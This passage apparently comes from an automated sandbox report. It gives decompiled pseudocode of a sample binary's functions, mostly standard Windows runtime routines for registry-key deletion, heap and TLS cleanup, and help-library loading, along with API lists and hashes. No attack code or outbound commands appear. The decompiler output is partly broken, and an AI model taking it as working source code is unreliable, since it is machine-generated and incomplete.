                                                      				_t52 = _t59 - 0x18;
                                                      				 *(_t59 - 0x20) = _t44;
                                                      				 *(_t59 - 0x1c) = _t54;
                                                      				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
                                                      				_t57 = _t30;
                                                      				if(_t30 == 0) {
                                                      					while(1) {
                                                      						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
                                                      						_t57 = _t34;
                                                      						_t66 = _t57;
                                                      						if(_t57 != 0) {
                                                      							break;
                                                      						}
                                                      						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
                                                      						_push(_t59);
                                                      						E00403667(_t42, _t59 - 0x14, _t54, _t57, _t66);
                                                      						 *(_t59 - 4) = 1;
                                                      						_t57 = E00405482(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
                                                      						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
                                                      						 *(_t59 - 4) = 0;
                                                      						E00403036( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
                                                      						if(_t42 == 0) {
                                                      							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					__eflags = _t57 - 0x103;
                                                      					if(_t57 == 0x103) {
                                                      						L6:
                                                      						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
                                                      					} else {
                                                      						__eflags = _t57 - 0x3f2;
                                                      						if(_t57 == 0x3f2) {
                                                      							goto L6;
                                                      						}
                                                      					}
                                                      					RegCloseKey( *(_t59 - 0x18));
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
                                                      				_pop(_t55);
                                                      				_pop(_t58);
                                                      				_pop(_t43);
                                                      				_t32 = E0041E5DF(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
                                                      				__eflags =  &(_t59[0x10c]);
                                                      				return _t32;
                                                      			}

















                                                      APIs
                                                      • __EH_prolog3_catch.LIBCMT ref: 004054A1
                                                      • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 004054C0
                                                      • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 004054DE
                                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00405559
                                                      • RegCloseKey.ADVAPI32(?), ref: 00405564
                                                        • Part of subcall function 00403667: __EH_prolog3.LIBCMT ref: 0040366E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CloseDeleteEnumH_prolog3H_prolog3_catchOpen
                                                      • String ID:
                                                      • API String ID: 301487041-0
                                                      • Opcode ID: ef6aa7cf2f3b8b7d913693d12d450bc24d80ee2784bfb5f8f524b31fd861a622
                                                      • Instruction ID: b1f98a2856fb891a4ad2f1730a2dfbfc327df959dd0772622e21178d5af673db
                                                      • Opcode Fuzzy Hash: ef6aa7cf2f3b8b7d913693d12d450bc24d80ee2784bfb5f8f524b31fd861a622
                                                      • Instruction Fuzzy Hash: 7921CC76900219ABDB25DFA4CC41AEEB7B4FB08314F10013AED95B73D0DB385E448BA4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0041A5D4(intOrPtr* __ecx, int* _a4) {
                                                      				int _v8;
                                                      				int _t12;
                                                      				int _t14;
                                                      				int _t22;
                                                      				int _t32;
                                                      				int* _t36;
                                                      
                                                      				_push(__ecx);
                                                      				_t35 = __ecx;
                                                      				if(__ecx == 0) {
                                                      					_t22 =  *0x446590; // 0x60
                                                      					_t12 =  *0x446594; // 0x60
                                                      					goto L6;
                                                      				} else {
                                                      					_t32 = GetMapMode( *(__ecx + 8));
                                                      					if(_t32 >= 7 || _t32 == 1) {
                                                      						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                      						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                      						L6:
                                                      						_t36 = _a4;
                                                      						_v8 = _t12;
                                                      						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                      						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                      						_t36[1] = _t14;
                                                      					} else {
                                                      						_push(3);
                                                      						 *((intOrPtr*)( *__ecx + 0x34))();
                                                      						E0040E4C1(__ecx, _a4);
                                                      						_push(_t32);
                                                      						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                      					}
                                                      				}
                                                      				return _t14;
                                                      			}










                                                      APIs
                                                      • GetMapMode.GDI32(?,?,?,?,?,?,004142E1,?,00000000,0000001C,00414C4F,?,?,?,?,?), ref: 0041A5E4
                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 0041A61E
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0041A627
                                                        • Part of subcall function 0040E4C1: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E501
                                                        • Part of subcall function 0040E4C1: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E51E
                                                      • MulDiv.KERNEL32(?,000009EC,00000060), ref: 0041A64B
                                                      • MulDiv.KERNEL32(00000000,000009EC,?), ref: 0041A656
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Mode
                                                      • String ID:
                                                      • API String ID: 696222070-0
                                                      • Opcode ID: 3008489b0365817b233b9e7bda17715b36219956bc4785caf84b3ef8eede7486
                                                      • Instruction ID: b67f60aca54f694c5be954c7caf55a9921f0b6cf90a1da25102bc38903e6d2d6
                                                      • Opcode Fuzzy Hash: 3008489b0365817b233b9e7bda17715b36219956bc4785caf84b3ef8eede7486
                                                      • Instruction Fuzzy Hash: 22112135700A00AFDB21AF56CC44C5EBFF9EF89310B15482AFA8697360C775AC528F95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E0041A662(intOrPtr* __ecx, int* _a4) {
                                                      				int _v8;
                                                      				int _t12;
                                                      				int _t14;
                                                      				int _t30;
                                                      				int _t33;
                                                      				int* _t36;
                                                      
                                                      				_push(__ecx);
                                                      				_t35 = __ecx;
                                                      				if(__ecx == 0) {
                                                      					_t30 =  *0x446590; // 0x60
                                                      					_t12 =  *0x446594; // 0x60
                                                      					goto L6;
                                                      				} else {
                                                      					_t33 = GetMapMode( *(__ecx + 8));
                                                      					if(_t33 >= 7 || _t33 == 1) {
                                                      						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                      						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                      						L6:
                                                      						_t36 = _a4;
                                                      						_v8 = _t12;
                                                      						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
                                                      						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
                                                      						_t36[1] = _t14;
                                                      					} else {
                                                      						_push(3);
                                                      						 *((intOrPtr*)( *__ecx + 0x34))();
                                                      						E0040E458(__ecx, _a4);
                                                      						_push(_t33);
                                                      						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                      					}
                                                      				}
                                                      				return _t14;
                                                      			}










                                                      APIs
                                                      • GetMapMode.GDI32(?,00000000,?,?,?,?,00414325,?,?,?,?,?,?), ref: 0041A672
                                                      • GetDeviceCaps.GDI32(?,00000058), ref: 0041A6AC
                                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0041A6B5
                                                        • Part of subcall function 0040E458: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E498
                                                        • Part of subcall function 0040E458: MulDiv.KERNEL32(?,00000000,00000000), ref: 0040E4B5
                                                      • MulDiv.KERNEL32(?,00000060,000009EC), ref: 0041A6D9
                                                      • MulDiv.KERNEL32(00000000,?,000009EC), ref: 0041A6E4
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CapsDevice$Mode
                                                      • String ID:
                                                      • API String ID: 696222070-0
                                                      • Opcode ID: 386dc1262c4054650f02494d28b98613bbfe5b95c5fa278da0b1572231e24210
                                                      • Instruction ID: d964a8700f0a9f0458d188cf6e9d936817c2b57de253648240f01c4d5d8773f5
                                                      • Opcode Fuzzy Hash: 386dc1262c4054650f02494d28b98613bbfe5b95c5fa278da0b1572231e24210
                                                      • Instruction Fuzzy Hash: 2811EC36200600AFDB21AF56CC4485EBBA9EF89750B15042AEA8597360C735AC618F99
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 39%
                                                      			E0041E18A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				intOrPtr* _t10;
                                                      				intOrPtr _t13;
                                                      				intOrPtr _t23;
                                                      				void* _t25;
                                                      
                                                      				_push(0xc);
                                                      				_push(0x43f4c8);
                                                      				_t8 = E00421418(__ebx, __edi, __esi);
                                                      				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                      				if(_t23 == 0) {
                                                      					L9:
                                                      					return E0042145D(_t8);
                                                      				}
                                                      				if( *0x448500 != 3) {
                                                      					_push(_t23);
                                                      					L7:
                                                      					_t8 = HeapFree( *0x4468d0, 0, ??);
                                                      					_t31 = _t8;
                                                      					if(_t8 == 0) {
                                                      						_t10 = E0041F8D2(_t31);
                                                      						 *_t10 = E0041F897(GetLastError());
                                                      					}
                                                      					goto L9;
                                                      				}
                                                      				E00422E2D(4);
                                                      				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                      				_t13 = E00422EA6(_t23);
                                                      				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                      				if(_t13 != 0) {
                                                      					_push(_t23);
                                                      					_push(_t13);
                                                      					E00422ED1();
                                                      				}
                                                      				 *(_t25 - 4) = 0xfffffffe;
                                                      				_t8 = E0041E1E0();
                                                      				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                      					goto L9;
                                                      				} else {
                                                      					_push( *((intOrPtr*)(_t25 + 8)));
                                                      					goto L7;
                                                      				}
                                                      			}








                                                      APIs
                                                      • __lock.LIBCMT ref: 0041E1A8
                                                        • Part of subcall function 00422E2D: __mtinitlocknum.LIBCMT ref: 00422E41
                                                        • Part of subcall function 00422E2D: __amsg_exit.LIBCMT ref: 00422E4D
                                                        • Part of subcall function 00422E2D: EnterCriticalSection.KERNEL32(D164E842,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C,004265BB,0041F8D7,0041F8D7,00000000,00000000,00000000,0042480F,00000001,00000214), ref: 00422E55
                                                      • ___sbh_find_block.LIBCMT ref: 0041E1B3
                                                      • ___sbh_free_block.LIBCMT ref: 0041E1C2
                                                      • HeapFree.KERNEL32(00000000,00401B31,0043F4C8,0000000C,00422E0E,00000000,0043F5F0,0000000C,00422E46,00401B31,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C), ref: 0041E1F2
                                                      • GetLastError.KERNEL32(?,?,0041F8D7,0041ED60,?,00401B31,00009618), ref: 0041E203
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                      • String ID:
                                                      • API String ID: 2714421763-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0040F63E(long* __ecx) {
                                                      				intOrPtr _t4;
                                                      				long _t5;
                                                      				void* _t6;
                                                      				void* _t13;
                                                      				intOrPtr _t14;
                                                      				long* _t15;
                                                      
                                                      				_t15 = __ecx;
                                                      				_t4 =  *((intOrPtr*)(__ecx + 0x14));
                                                      				if(_t4 != 0) {
                                                      					do {
                                                      						_t14 =  *((intOrPtr*)(_t4 + 4));
                                                      						E0040F496(__ecx, _t4, 0);
                                                      						_t4 = _t14;
                                                      					} while (_t14 != 0);
                                                      				}
                                                      				_t5 =  *_t15;
                                                      				if(_t5 != 0xffffffff) {
                                                      					TlsFree(_t5);
                                                      				}
                                                      				_t6 = _t15[4];
                                                      				if(_t6 != 0) {
                                                      					_t13 = GlobalHandle(_t6);
                                                      					GlobalUnlock(_t13);
                                                      					_t6 = GlobalFree(_t13);
                                                      				}
                                                      				DeleteCriticalSection( &(_t15[7]));
                                                      				return _t6;
                                                      			}










                                                      APIs
                                                      • TlsFree.KERNEL32(?), ref: 0040F664
                                                      • GlobalHandle.KERNEL32(?), ref: 0040F672
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040F67B
                                                      • GlobalFree.KERNEL32 ref: 0040F682
                                                      • DeleteCriticalSection.KERNEL32 ref: 0040F68C
                                                        • Part of subcall function 0040F496: EnterCriticalSection.KERNEL32(?), ref: 0040F4F3
                                                        • Part of subcall function 0040F496: LeaveCriticalSection.KERNEL32(?,?), ref: 0040F503
                                                        • Part of subcall function 0040F496: LocalFree.KERNEL32(?), ref: 0040F50C
                                                        • Part of subcall function 0040F496: TlsSetValue.KERNEL32(?,00000000), ref: 0040F51E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                      • String ID:
                                                      • API String ID: 1549993015-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 90%
                                                      			E0040AD88(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                      				intOrPtr _v0;
                                                      				intOrPtr _v4;
                                                      				void* __esi;
                                                      				struct HINSTANCE__* _t16;
                                                      				_Unknown_base(*)()* _t17;
                                                      				void* _t25;
                                                      				void* _t26;
                                                      				void* _t28;
                                                      
                                                      				_t28 = __eflags;
                                                      				_t24 = __edi;
                                                      				_t21 = __ebx;
                                                      				E0040FA7F(__ebx, _t25, __ebp, 0xc);
                                                      				_push(E0040A257);
                                                      				_t26 = E0040F0A3(__ebx, 0x446410, __edi, _t25, _t28);
                                                      				_t29 = _t26;
                                                      				if(_t26 == 0) {
                                                      					E004037E3(_t21, 0x446410, __edi, _t26, _t29);
                                                      				}
                                                      				_t30 =  *(_t26 + 8);
                                                      				if( *(_t26 + 8) != 0) {
                                                      					L7:
                                                      					E0040FAEC(0xc);
                                                      					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
                                                      				} else {
                                                      					_push("hhctrl.ocx");
                                                      					_t16 = E004088A1(_t21, 0x446410, _t24, _t26, _t30);
                                                      					 *(_t26 + 4) = _t16;
                                                      					if(_t16 != 0) {
                                                      						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                                                      						__eflags = _t17;
                                                      						 *(_t26 + 8) = _t17;
                                                      						if(_t17 != 0) {
                                                      							goto L7;
                                                      						}
                                                      						FreeLibrary( *(_t26 + 4));
                                                      						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                                                      					}
                                                      					return 0;
                                                      				}
                                                      			}












                                                      APIs
                                                        • Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FABB
                                                        • Part of subcall function 0040FA7F: InitializeCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FACA
                                                        • Part of subcall function 0040FA7F: LeaveCriticalSection.KERNEL32(004467A8,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAD7
                                                        • Part of subcall function 0040FA7F: EnterCriticalSection.KERNEL32(?,?,?,?,?,0040F0BE,00000010,00000008,0040DBC2,0040DB65,004037FD,004048F5,?,00404F86,00000004,004044D3), ref: 0040FAE3
                                                        • Part of subcall function 0040F0A3: __EH_prolog3_catch.LIBCMT ref: 0040F0AA
                                                        • Part of subcall function 004037E3: __CxxThrowException@8.LIBCMT ref: 004037F7
                                                        • Part of subcall function 004037E3: __EH_prolog3.LIBCMT ref: 00403804
                                                      • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 0040ADCC
                                                      • FreeLibrary.KERNEL32(?), ref: 0040ADDC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                      • String ID: HtmlHelpA$hhctrl.ocx
                                                      • API String ID: 2853499158-63838506
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0042CD6B(intOrPtr _a4) {
                                                      				intOrPtr _t2;
                                                      				struct _CRITICAL_SECTION* _t3;
                                                      
                                                      				_t2 = _a4;
                                                      				if(_t2 < 0x4442e0 || _t2 > 0x444540) {
                                                      					_t3 = _t2 + 0x20;
                                                      					EnterCriticalSection(_t3);
                                                      					return _t3;
                                                      				} else {
                                                      					return E00422E2D((_t2 - 0x4442e0 >> 5) + 0x10);
                                                      				}
                                                      			}






                                                      APIs
                                                      • __lock.LIBCMT ref: 0042CD88
                                                        • Part of subcall function 00422E2D: __mtinitlocknum.LIBCMT ref: 00422E41
                                                        • Part of subcall function 00422E2D: __amsg_exit.LIBCMT ref: 00422E4D
                                                        • Part of subcall function 00422E2D: EnterCriticalSection.KERNEL32(D164E842,D164E842,00401B31,0041EDEB,00000004,0043F508,0000000C,004265BB,0041F8D7,0041F8D7,00000000,00000000,00000000,0042480F,00000001,00000214), ref: 00422E55
                                                      • EnterCriticalSection.KERNEL32(?,00430745,?,0043FA38,0000000C,0042DD98,004442E0,0043F9D0,00000010,0042CD5E), ref: 0042CD93
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterSection$__amsg_exit__lock__mtinitlocknum
                                                      • String ID: @ED$BD
                                                      • API String ID: 3996875869-3832678117
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 65%
                                                      			E0042AD70() {
                                                      				signed long long _v12;
                                                      				signed int _v20;
                                                      				signed long long _v28;
                                                      				signed char _t8;
                                                      
                                                      				_t8 = GetModuleHandleA("KERNEL32");
                                                      				if(_t8 == 0) {
                                                      					L6:
                                                      					_v20 =  *0x438170;
                                                      					_v28 =  *0x438168;
                                                      					asm("fsubr qword [ebp-0x18]");
                                                      					_v12 = _v28 / _v20 * _v20;
                                                      					asm("fld1");
                                                      					asm("fcomp qword [ebp-0x8]");
                                                      					asm("fnstsw ax");
                                                      					if((_t8 & 0x00000005) != 0) {
                                                      						return 0;
                                                      					} else {
                                                      						return 1;
                                                      					}
                                                      				} else {
                                                      					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                      					if(__eax == 0) {
                                                      						goto L6;
                                                      					} else {
                                                      						_push(0);
                                                      						return __eax;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(KERNEL32,0042244D), ref: 0042AD75
                                                      • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0042AD85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleModuleProc
                                                      • String ID: IsProcessorFeaturePresent$KERNEL32
                                                      • API String ID: 1646373207-3105848591
                                                      • Opcode ID: 647a90eff25c5521bd3327aad01c29093d74d5d1ebfe396131cc2a91f97f7659
                                                      • Instruction ID: cd959e317abe6be5cb1291d7da4cfedc1d6fa2a895f225a505106cb1dce581d7
                                                      • Opcode Fuzzy Hash: 647a90eff25c5521bd3327aad01c29093d74d5d1ebfe396131cc2a91f97f7659
                                                      • Instruction Fuzzy Hash: 64C0809035131357DD1117B1AC0D71B301D5B44B83F6024567809E45C0DE5CE010442F
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 81%
                                                      			E0041733F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
                                                      				signed int _v4;
                                                      				intOrPtr _v12;
                                                      				signed int _v16;
                                                      				signed int _v20;
                                                      				signed int _v24;
                                                      				signed int _v28;
                                                      				signed int _v32;
                                                      				intOrPtr _v36;
                                                      				void* _v40;
                                                      				char _v124;
                                                      				void* _v168;
                                                      				void* _v176;
                                                      				void* _v184;
                                                      				void* _v196;
                                                      				signed int* __ebp;
                                                      				signed int _t132;
                                                      				signed int _t138;
                                                      				signed int _t139;
                                                      				void* _t140;
                                                      				intOrPtr* _t145;
                                                      				intOrPtr* _t148;
                                                      				signed int _t149;
                                                      				signed int _t151;
                                                      				intOrPtr* _t152;
                                                      				void* _t154;
                                                      				intOrPtr* _t158;
                                                      				signed int _t163;
                                                      				intOrPtr _t164;
                                                      				intOrPtr* _t166;
                                                      				intOrPtr* _t168;
                                                      				void* _t179;
                                                      				intOrPtr _t182;
                                                      				signed int _t183;
                                                      				signed int _t185;
                                                      				signed int* _t186;
                                                      				void* _t187;
                                                      				intOrPtr* _t188;
                                                      				signed int _t202;
                                                      				signed int _t204;
                                                      				intOrPtr _t214;
                                                      				intOrPtr _t220;
                                                      				intOrPtr* _t222;
                                                      				intOrPtr _t223;
                                                      				signed int _t225;
                                                      				void* _t228;
                                                      				void* _t229;
                                                      				void* _t230;
                                                      				void* _t231;
                                                      				void* _t232;
                                                      
                                                      				_t188 = __ecx;
                                                      				_t181 = __ebx;
                                                      				_t232 = _t231 - 0x74;
                                                      				_t225 =  &_v124;
                                                      				_t132 =  *0x443590; // 0xa920217c
                                                      				_a116 = _t132 ^ _t225;
                                                      				_push(0x1c);
                                                      				E0041F6EA(E004331D4, __ebx, __edi, __esi);
                                                      				_t222 = __ecx;
                                                      				_v16 =  *((intOrPtr*)(__ecx + 0x14));
                                                      				_a4 =  *((intOrPtr*)(__ecx + 0x10));
                                                      				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                      					_t138 =  *(__ecx + 8);
                                                      					__eflags = _t138;
                                                      					if(_t138 != 0) {
                                                      						_t215 =  &_a12;
                                                      						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x439330,  &_a12,  &_a8);
                                                      						__eflags = _t139;
                                                      						if(_t139 >= 0) {
                                                      							E00413D5B( &_a12,  &_a20, 0x439a5c);
                                                      							_a52 = _a52 | 0xffffffff;
                                                      							_a44 = 0;
                                                      							_a48 = 0;
                                                      							_a56 = 0x18;
                                                      							_a60 = 0;
                                                      							_a64 = 0x1fb;
                                                      							E00413D5B( &_a12,  &_a68, 0x439a44);
                                                      							_t145 = _a12;
                                                      							_a100 = _a100 | 0xffffffff;
                                                      							_t215 =  &_a20;
                                                      							_a92 = 0x1c;
                                                      							_a96 = 0;
                                                      							_a104 = 0x20;
                                                      							_a108 = 0;
                                                      							_a112 = 0x1e;
                                                      							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
                                                      							__eflags = _t183;
                                                      							if(_t183 >= 0) {
                                                      								_t215 = 0;
                                                      								_v40 = _a8;
                                                      								_t148 = _a12;
                                                      								_v36 = 1;
                                                      								_v32 = 0;
                                                      								_v28 = 0;
                                                      								_v24 = 0;
                                                      								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
                                                      								__eflags = _t149;
                                                      								 *_t225 = _t149;
                                                      								if(_t149 >= 0) {
                                                      									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
                                                      									_t151 = _v20;
                                                      									_a8 = _t151;
                                                      									 *(_t222 + 0x10) = _t151;
                                                      									_t152 = _a12;
                                                      									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
                                                      									 *((intOrPtr*)( *_t152 + 8))(_t152);
                                                      									goto L32;
                                                      								} else {
                                                      									_t166 = _a12;
                                                      									 *((intOrPtr*)( *_t166 + 8))(_t166);
                                                      								}
                                                      								goto L50;
                                                      							} else {
                                                      								_t168 = _a12;
                                                      								 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                      								_t139 = _t183;
                                                      							}
                                                      						}
                                                      					} else {
                                                      						_t139 = 0;
                                                      					}
                                                      					goto L51;
                                                      				} else {
                                                      					__eax =  *(__esi + 0x4c);
                                                      					__ecx =  *__eax;
                                                      					__edx =  &_a16;
                                                      					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x439540, __edx);
                                                      					__eflags = __eax;
                                                      					 *__ebp = __eax;
                                                      					if(__eax < 0) {
                                                      						L51:
